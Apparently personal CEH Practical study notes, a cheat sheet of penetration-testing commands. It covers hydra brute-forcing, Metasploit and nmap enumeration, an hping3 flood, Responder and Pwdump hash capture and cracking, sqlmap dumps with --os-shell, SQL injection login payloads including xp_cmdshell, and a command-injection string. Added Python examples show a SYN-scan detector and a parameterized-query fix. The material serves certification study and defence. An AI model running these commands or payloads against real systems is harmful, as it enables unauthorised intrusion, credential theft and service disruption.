Cheat Sheets
NMAP Cheat sheet:
https://www.stationx.net/nmap-cheat-sheet/
Bruteforce Cheatsheet :
https://book.hacktricks.xyz/brute-force --> ALL
ftp : hydra -l root -P passwords.txt [-t 32] <IP> ftp
ssh : hydra -l root -P passwords.txt [-t 32] <IP> ssh
smb : hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1 , nmap --script smb-brute -p 445 <IP>
smtp : hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
mysql : hydra -L usernames.txt -P pass.txt <IP> mysql
rdp : hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
SQLMAP Cheatsheet :
https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet
Wireshark Cheatsheet :
https://www.stationx.net/wireshark-cheat-sheet/
WPSCAN :
https://blog.sucuri.net/2021/05/wpscan-how-to-scan-for-wordpress-vulnerabilities.html
ADB :
adb port : 55555
adb : https://book.hacktricks.xyz/pentesting/5555-android-debug-bridge
TOOLS:
1- NMap
2- Hydra
3- WPScan
4- SQLMap
5- Owasp ZAP
6- Veracrypt
7- Wireshark
8- CrypTool
9- BCText Encoder
10- adb
CEH PRACTICAL - MY NOTES:
Enumeration using Metasploit :
msfdb init
service postgresql start
msfconsole
msf > db_status
nmap -Pn -sS -A -oX Test 10.10.10.0/24
db_import Test
hosts -> To show all available hosts in the subnet
db_nmap -sS -A 10.10.10.16 -> To extract services of particular machine
services -> to get all available services in a subnet
SMB Version Enumeration using MSF
use scanner/smb/smb_version
set RHOSTS 10.10.10.8-16
set THREADS 100
run
hosts -> now exact os_flavor information has been updated
Module 03 : Scanning Networks
Port Scanning using Hping3:
hping3 --scan 1-3000 -S 10.10.10.10
The --scan parameter defines the port range to scan and -S sets the SYN flag.
Pinging the target using HPing3:
hping3 -c 3 10.10.10.10
-c 3 means that we only want to send three packets to the target machine.
UDP Packet Crafting
hping3 10.10.10.10 --udp --rand-source --data 500
TCP SYN request
hping3 -S 10.10.10.10 -p 80 -c 5
-S sets the SYN flag on the packets sent to the target machine, -p selects the destination port, and -c is the number of packets to send.
HPing flood
hping3 10.10.10.10 --flood
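From the defender's side, the SYN sweep produced by the hping3 --scan command above shows up as one source sending SYN-only packets to many distinct ports of one host. The following detector is an added example, not part of the original cheat sheet; it assumes Linux netfilter/iptables LOG lines (tokens such as SRC=, DST=, DPT=, SYN, ACK) and the sample lines it runs over are constructed here.

```python
import re
from collections import defaultdict

# Assumed netfilter LOG format, e.g.:
#   kernel: IN=eth0 OUT= SRC=10.10.10.99 DST=10.10.10.10 PROTO=TCP SPT=40001 DPT=22 SYN URGP=0
SRC_RE = re.compile(r"\bSRC=(\S+)")
DST_RE = re.compile(r"\bDST=(\S+)")
DPT_RE = re.compile(r"\bDPT=(\d+)")


def build_sample_log():
    """Constructed sample: 10.10.10.99 sweeps ports 1..40 with SYN-only packets
    (roughly what `hping3 --scan 1-40 -S 10.10.10.10` produces), while
    10.10.10.5 makes a few ordinary connections to ports 80 and 443."""
    lines = []
    for port in range(1, 41):
        lines.append(f"kernel: IN=eth0 OUT= SRC=10.10.10.99 DST=10.10.10.10 "
                     f"PROTO=TCP SPT={40000 + port} DPT={port} SYN URGP=0")
    for port in (80, 443, 80):
        lines.append(f"kernel: IN=eth0 OUT= SRC=10.10.10.5 DST=10.10.10.10 "
                     f"PROTO=TCP SPT=51000 DPT={port} SYN URGP=0")
    return lines


def syn_sweep_sources(log_lines, min_ports=20):
    """Return {(src, dst): set_of_ports} for every source that sent SYN-only
    probes to at least `min_ports` distinct destination ports on one host.
    SYN+ACK replies are ignored so a busy server is not flagged for answering."""
    seen = defaultdict(set)
    for line in log_lines:
        tokens = set(line.split())
        if "PROTO=TCP" not in tokens or "SYN" not in tokens or "ACK" in tokens:
            continue
        src, dst, dpt = SRC_RE.search(line), DST_RE.search(line), DPT_RE.search(line)
        if not (src and dst and dpt):
            continue  # malformed line: skip rather than crash the detector
        seen[(src.group(1), dst.group(1))].add(int(dpt.group(1)))
    return {pair: ports for pair, ports in seen.items() if len(ports) >= min_ports}


if __name__ == "__main__":
    for (src, dst), ports in syn_sweep_sources(build_sample_log()).items():
        print(f"possible SYN sweep: {src} -> {dst}, {len(ports)} distinct ports")
```

Tune `min_ports` to the host's normal fan-in; a few distinct ports from one client is ordinary browsing, tens of them within a short log window is not.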
Module 04 : Enumeration
SNMP Enumeration (161) :
nmap -sU -p 161 10.10.10.12
nmap -sU -p 161 --script=snmp-brute 10.10.10.12
msfconsole
use auxiliary/scanner/snmp/snmp_login
set RHOSTS and exploit
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS and exploit
NetBIOS Enumeration (139) :
nbtstat -A 10.10.10.16
net use
net use \\10.10.10.16\e "" /user:""
NetBIOS Enumerator
Enum4Linux Wins Enumeration :
enum4linux -u martin -p apple -U 10.10.10.12 -> Users Enumeration
enum4linux -u martin -p apple -o 10.10.10.12 -> OS Enumeration
enum4linux -u martin -p apple -P 10.10.10.12 -> Password Policy Information
enum4linux -u martin -p apple -G 10.10.10.12 -> Groups Information
enum4linux -u martin -p apple -S 10.10.10.12 -> Share Policy Information (SMB Shares Enumeration)
Active Directory LDAP Enumeration : ADExplorer
Module 05 : Vulnerability Analysis
nikto -h http://www.goodshopping.com -Tuning 1
Nessus runs on https://localhost:8834
Username: admin
Password: password
Nessus -> Policies > Advanced scan
Discovery > Host Discovery > Turn off Ping the remote host
Port Scanning > check the Verify open TCP ports found by local port enumerators
Advanced
Max number of TCP sessions per host = unlimited
Max number of TCP sessions per scan = unlimited
Credentials > Windows > Username & Password
Save policy > Create new scan > User Defined
Enter name & Target
Schedule tab > Turn off Enabled
Hit launch from drop-down of save.
Module 06 : System Hacking
NTLM Hash crack :
responder -I eth0
/usr/share/responder/logs --> Responder log location
john /usr/share/responder/logs/ntlm.txt
Rainbowtable crack using Winrtgen :
Open winrtgen and add new table
Select ntlm from Hash dropdown list.
Set Min Len as 4, Max Len as 6 and Chain Count 4000000
Select loweralpha from Charset dropdown list (it depends on the password).
rcrack_gui.exe to crack hash with rainbow table
Hash dump with Pwdump7 and crack with Ophcrack :
wmic useraccount get name,sid --> Get user acc names and SID
PwDump7.exe > c:\hashes.txt
Replace boxes in hashes.txt with relevant usernames from step 1.
Ophcrack.exe -> load -> PWDUMP File
Tables -> Vista free -> select the table directory -> crack
Module 08 : Sniffing
http.request.method == "POST" -> Wireshark filter for filtering HTTP POST requests
Capture traffic from remote interface via wireshark
Capture > Options > Manage Interfaces
Remote Interface > Add > Host & Port (2002)
Username & password > Start
Module 13 : Hacking Web Servers
FTP Bruteforce with Hydra
hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://10.10.10.11
Module 14 : Hacking Web Applications
Wordpress
wpscan --url http://10.10.10.12:8080/CEH --enumerate u
WP password bruteforce
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
RCE
ping 127.0.0.1 | hostname | net user
Module 15 : SQL Injection
SQLMAP Extract DBS
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="cookies xxx" --dbs
Extract Tables
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="cookies xxx" -D moviescope --tables
Extract Columns
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="cookies xxx" -D moviescope -T User_Login --columns
Dump Data
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="cookies xxx" -D moviescope -T User_Login --dump
OS Shell to execute commands
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="cookies xxx" --os-shell
Login bypass
blah' or 1=1 --
Insert data into DB from login
blah';insert into login values ('john','apple123');
Create database from login
blah';create database mydatabase;
Execute cmd from login
blah';exec master..xp_cmdshell 'ping www.moviescope.com -l 65000 -t'; --
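Every login payload above works only because the application pastes the submitted username into the query string. The example below is added here and is not from the original cheat sheet: it builds a throwaway SQLite login table (table and column names are assumptions), shows the concatenated query the `blah' or 1=1 --` bypass relies on, and the parameterized query that treats the same input as plain data.

```python
import sqlite3


def make_db():
    """Constructed demo database with one account, mirroring the kind of
    login table the cheat sheet's payloads target (names are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (username TEXT, password TEXT)")
    db.execute("INSERT INTO login VALUES ('john', 'apple123')")
    return db


def login_vulnerable(db, username, password):
    """String concatenation: whatever the user types becomes part of the SQL.
    With username = "blah' or 1=1 --" the WHERE clause collapses to
    username = 'blah' or 1=1, and the -- comments out the password check."""
    query = ("SELECT username FROM login WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Bound parameters: the driver sends the values separately from the SQL,
    so quotes and comment markers in the input are just characters."""
    row = db.execute(
        "SELECT username FROM login WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "blah' or 1=1 --"
    print("vulnerable   :", login_vulnerable(db, payload, "x"))      # john
    print("parameterized:", login_parameterized(db, payload, "x"))  # None
```

The stacked `;insert` / `;create database` / `xp_cmdshell` payloads need a backend that runs several statements per request (sqlite3's `execute()` refuses them outright); parameterized queries close that door on every backend, because the input is never parsed as SQL at all.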
Module 19 : Cloud Computing